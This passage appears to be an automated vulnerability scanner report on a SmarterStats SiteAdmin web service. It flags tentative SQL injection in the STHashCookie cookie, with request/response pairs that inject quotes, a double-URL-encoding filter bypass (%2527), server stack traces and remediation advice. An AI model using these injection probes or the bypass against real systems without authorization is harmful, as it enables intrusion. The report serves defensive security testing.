&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/Site&gt;
&lt;/GetSiteResult&gt;
&lt;/GetSiteResponse&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetSite xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;/GetSite&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetSiteResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetSiteResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Site&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/Site&gt;
&lt;/GetSiteResult&gt;
&lt;/GetSiteResponse&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/GetSite?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;SiteInfoResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Site&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/Site&gt;
&lt;/SiteInfoResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/GetSite HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;SiteInfoResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Site&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/Site&gt;
&lt;/SiteInfoResult&gt;</pre>
</span>

</span>









</body>
</html>

2.10. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STHashCookie cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The STHashCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the STHashCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the STHashCookie cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /Services/SiteAdmin.asmx?op=MoveSite2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}%2527; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:03:36 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6785
Connection: Close

<html>
<head>
<title>Collection was modified; enumeration operation may not execute.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Collection was modified; enumeration operation may not execute.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.InvalidOperationException: Collection was modified; enumeration operation may not execute.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[InvalidOperationException: Collection was modified; enumeration operation may not execute.]
System.Collections.HashtableEnumerator.MoveNext() +12630115
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +536
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[InvalidOperationException]: Collection was modified; enumeration operation may not execute.
at System.Collections.Hashtable.HashtableEnumerator.MoveNext()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=MoveSite2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}%2527%2527; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:03:37 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 9415
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>MoveSite2</h2>
<p class="intro">Moves one site from one Server to another Server listed in the MRS and adds more than one log path.</p>

<h3>Test</h3>

The test form is only available for methods with primitive types as parameters.
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/MoveSite2"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;MoveSite2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DestServerID&gt;<font class=value>int</font>&lt;/DestServerID&gt;
&lt;DestSmarterLogPath&gt;<font class=value>string</font>&lt;/DestSmarterLogPath&gt;
&lt;DestConfigLogPaths&gt;
&lt;ConfigLogLocation&gt;
&lt;LocationGUID&gt;<font class=value>string</font>&lt;/LocationGUID&gt;
&lt;FileWildcard&gt;<font class=value>string</font>&lt;/FileWildcard&gt;
&lt;MaxDays&gt;<font class=value>int</font>&lt;/MaxDays&gt;
&lt;FilePath&gt;<font class=value>string</font>&lt;/FilePath&gt;
&lt;/ConfigLogLocation&gt;
&lt;ConfigLogLocation&gt;
&lt;LocationGUID&gt;<font class=value>string</font>&lt;/LocationGUID&gt;
&lt;FileWildcard&gt;<font class=value>string</font>&lt;/FileWildcard&gt;
&lt;MaxDays&gt;<font class=value>int</font>&lt;/MaxDays&gt;
&lt;FilePath&gt;<font class=value>string</font>&lt;/FilePath&gt;
&lt;/ConfigLogLocation&gt;
&lt;/DestConfigLogPaths&gt;
&lt;DestExportPath&gt;<font class=value>string</font>&lt;/DestExportPath&gt;
&lt;DestExportPathURL&gt;<font class=value>string</font>&lt;/DestExportPathURL&gt;
&lt;CopyFiles&gt;<font class=value>boolean</font>&lt;/CopyFiles&gt;
&lt;/MoveSite2&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;MoveSite2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;MoveSite2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/MoveSite2Result&gt;
&lt;/MoveSite2Response&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;MoveSite2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DestServerID&gt;<font class=value>int</font>&lt;/DestServerID&gt;
&lt;DestSmarterLogPath&gt;<font class=value>string</font>&lt;/DestSmarterLogPath&gt;
&lt;DestConfigLogPaths&gt;
&lt;ConfigLogLocation&gt;
&lt;LocationGUID&gt;<font class=value>string</font>&lt;/LocationGUID&gt;
&lt;FileWildcard&gt;<font class=value>string</font>&lt;/FileWildcard&gt;
&lt;MaxDays&gt;<font class=value>int</font>&lt;/MaxDays&gt;
&lt;FilePath&gt;<font class=value>string</font>&lt;/FilePath&gt;
&lt;/ConfigLogLocation&gt;
&lt;ConfigLogLocation&gt;
&lt;LocationGUID&gt;<font class=value>string</font>&lt;/LocationGUID&gt;
&lt;FileWildcard&gt;<font class=value>string</font>&lt;/FileWildcard&gt;
&lt;MaxDays&gt;<font class=value>int</font>&lt;/MaxDays&gt;
&lt;FilePath&gt;<font class=value>string</font>&lt;/FilePath&gt;
&lt;/ConfigLogLocation&gt;
&lt;/DestConfigLogPaths&gt;
&lt;DestExportPath&gt;<font class=value>string</font>&lt;/DestExportPath&gt;
&lt;DestExportPathURL&gt;<font class=value>string</font>&lt;/DestExportPathURL&gt;
&lt;CopyFiles&gt;<font class=value>boolean</font>&lt;/CopyFiles&gt;
&lt;/MoveSite2&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;MoveSite2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;MoveSite2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/MoveSite2Result&gt;
&lt;/MoveSite2Response&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>





</span>









</body>
</html>

2.11. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STHashCookie cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The STHashCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the STHashCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /Services/SiteAdmin.asmx?op=DeleteSiteByName HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}'; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:39 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
